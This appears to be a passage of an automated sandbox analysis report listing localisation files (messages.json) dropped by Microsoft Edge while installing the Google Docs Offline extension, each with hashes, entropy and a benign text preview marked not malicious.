                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                Malicious:false
                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\da\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):883
                                Entropy (8bit):4.5096240460083905
                                Encrypted:false
                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\de\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1031
                                Entropy (8bit):4.621865814402898
                                Encrypted:false
                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                MD5:D116453277CC860D196887CEC6432FFE
                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\el\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1613
                                Entropy (8bit):4.618182455684241
                                Encrypted:false
                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\en\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):851
                                Entropy (8bit):4.4858053753176526
                                Encrypted:false
                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\en_CA\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):851
                                Entropy (8bit):4.4858053753176526
                                Encrypted:false
                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\en_GB\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):848
                                Entropy (8bit):4.494568170878587
                                Encrypted:false
                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\en_US\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1425
                                Entropy (8bit):4.461560329690825
                                Encrypted:false
                                SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                Malicious:false
                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\es\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):961
                                Entropy (8bit):4.537633413451255
                                Encrypted:false
                                SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                MD5:F61916A206AC0E971CDCB63B29E580E3
                                SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\es_419\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):959
                                Entropy (8bit):4.570019855018913
                                Encrypted:false
                                SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                MD5:535331F8FB98894877811B14994FEA9D
                                SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\et\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):968
                                Entropy (8bit):4.633956349931516
                                Encrypted:false
                                SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                MD5:64204786E7A7C1ED9C241F1C59B81007
                                SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\eu\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):838
                                Entropy (8bit):4.4975520913636595
                                Encrypted:false
                                SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                Malicious:false
                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\fa\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1305
                                Entropy (8bit):4.673517697192589
                                Encrypted:false
                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\fi\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):911
                                Entropy (8bit):4.6294343834070935
                                Encrypted:false
                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\fil\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):939
                                Entropy (8bit):4.451724169062555
                                Encrypted:false
                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\fr\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):977
                                Entropy (8bit):4.622066056638277
                                Encrypted:false
                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\fr_CA\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):972
                                Entropy (8bit):4.621319511196614
                                Encrypted:false
                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\gl\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):990
                                Entropy (8bit):4.497202347098541
                                Encrypted:false
                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\gu\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1658
                                Entropy (8bit):4.294833932445159
                                Encrypted:false
